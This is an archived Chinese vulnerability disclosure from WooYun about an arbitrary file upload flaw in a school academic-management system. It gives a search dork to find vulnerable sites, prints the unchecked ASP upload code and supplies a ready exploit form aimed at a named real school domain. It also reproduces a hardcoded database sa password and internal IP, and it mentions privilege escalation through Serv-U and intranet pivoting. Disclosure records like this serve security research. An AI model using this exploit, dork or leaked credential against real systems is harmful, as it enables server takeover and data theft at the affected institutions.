乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-29: 细节已通知厂商并且等待厂商处理中 2014-09-03: 厂商已经确认,细节仅向厂商公开 2014-09-06: 细节向第三方安全合作伙伴开放 2014-10-28: 细节向核心白帽子及相关领域专家公开 2014-11-07: 细节向普通白帽子公开 2014-11-17: 细节向实习白帽子公开 2014-11-27: 细节向公众公开
RT
关键词:inurl:ShowGGTZ.asp?GGTZID=
文件:jwgl\jcxx\savetofile.asp
<%OPTION EXPLICIT%><!--#include FILE="upfile_class.asp"--><%server.ScriptTimeout =10000000dim upfile,formPath,ServerPath,FSPath,formName,FileName,oFileset upfile=new upfile_class ''建立上传对象upfile.GetData (10240000) '取得上传数据,限制最大上传10M%><html><head><title>文件上传 - 长沙市强科技发展有限责任公司·版权所有</title><style type="text/css"><!--.p9{ font-size: 9pt; font-family: 宋体 }--></style><meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head><body leftmargin="20" topmargin="20" class="p9"><p class="tx1"><font color="#0000FF" size="1"></font></p><hr size=1 noshadow width=300 align=left><%if upfile.err > 0 then '如果出错 select case upfile.err case 1 Response.Write "你没有上传数据呀???是不是搞错了??" case 2 Response.Write "你上传的文件超出我们的限制,最大10M" end select else%><table border="1" cellpadding="0" cellspacing="0" bordercolor="#000000" class="p9" style="border-collapse: collapse"> <tr bgcolor="#CCCCCC"> <td height="25" valign='middle'> 本地文件 </td> <td valign='middle'> 大小(字节) </td> <td valign='middle'> 上传到 </td> </tr> <% FSPath=GetFilePath(Server.mappath("upfile.asp"),"\")'取得当前文件在服务器路径 ServerPath=GetFilePath(Request.ServerVariables("HTTP_REFERER"),"/")'取得在网站上的位置 for each formName in upfile.file '列出所有上传了的文件 set oFile=upfile.file(formname) FileName=upfile.form(formName)'取得文本域的值 if not FileName>"" then FileName=oFile.filename'如果没有输入新的文件名,就用原来的文件名 oFile.SaveToFile FSPath&FileName ''保存文件 %><tr> <td valign="middle" align = "left" height="20"><%=oFile.FilePath&oFile.FileName%></td> <td valign="middle" align = "center"><%=oFile.filesize%></td> <td valign="middle" align = "center"><A HREF="<%=serverpath&FileName%>" title = "<%=serverpath&FileName%>"><%=FileName%></A></td> </tr><% set oFile=nothing next%> <tr> <td colspan="3" height="25" valign='middle'> 一共上传了<%=upfile.file.Count%>个文件</td> </tr><%end ifset upfile=nothing '删除此对象%></table><p></p></p>[<a href="javascript:history.back();">返回</a>]</body></html><%function GetFilePath(FullPath,str) If FullPath <> "" Then GetFilePath = left(FullPath,InStrRev(FullPath, str)) Else GetFilePath = "" End IfEnd function%>
利用exp:
<form method="post" name="form1" action="http://e.tjmvti.cn/jwgl/jcxx/savetofile.asp" enctype="multipart/form-data"> <table border="0" align="center" cellpadding="0" cellspacing="0" width="100%"> <tr> <td><div align="center"><font color="#0000ff" size="4"><b>exp</b></font></div></td> </tr> <tr> <td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#111111" style="BORDER-COLLAPSE: collapse"> <tr> <td height="27" width="100" colspan="5"> </td> </tr> <tr> <td width="750" colspan="5"> <div id="uptd"> </div></td> </tr> <tr> <td height="30" align="middle" width="50"> <input type=file name=uploadfile size="100"> </td> <td height="30" align="middle" width="100"> <p align="center"> <input type="submit" name="Button2" class="bt" value="上传"> </td> <td height="30" align="middle" width="100"> </td> </tr> </table></td> </tr> </table> </form>
直接用exp.html任意文件上传,服务器几乎是sa权限,提权都是妥妥的,随便打个比方吧。
配置文件:
conn\connstring.asp<!--#include file="../../connstring.asp"--><%'以上代码严禁删除ServerName=Request.ServerVariables("Server_Name")ProgramName ="jwgl"SName = "10.0.0.1"DBName = "TJMTI"DBBackDirName = "Dbback" if ProgramName ="" then ServerNameProgramName = ServerName else ServerNameProgramName= ServerName & "/" & ProgramName end if if Connstring = "" then connstring="driver={sql server};server=" & Sname & ";database=" & DBName & ";uid=sa;pwd=qzdatasoft123456789" '数据库连接语句 %>管理员还是蛮聪明的,数据和服务分离的,但是这给后来的内网渗透带来了极大的危害、
服务器自己带的Serv-U Exec >>提权。
可以看到,服务器都成为马蜂窝了,威胁还不只这么一点哦。
关键语句:if Connstring = "" then connstring="driver={sql server};server=" & Sname & ";database=" & DBName & ";uid=sa;pwd=qzdatasoft123456789"
直接提权10.0.0.1服务器。
好吧,下面是其他案例截图吧。
狗哥这还走小厂商吗?
危害等级:高
漏洞Rank:16
确认时间:2014-09-03 10:36
已经转报给教育网应急组织。
暂无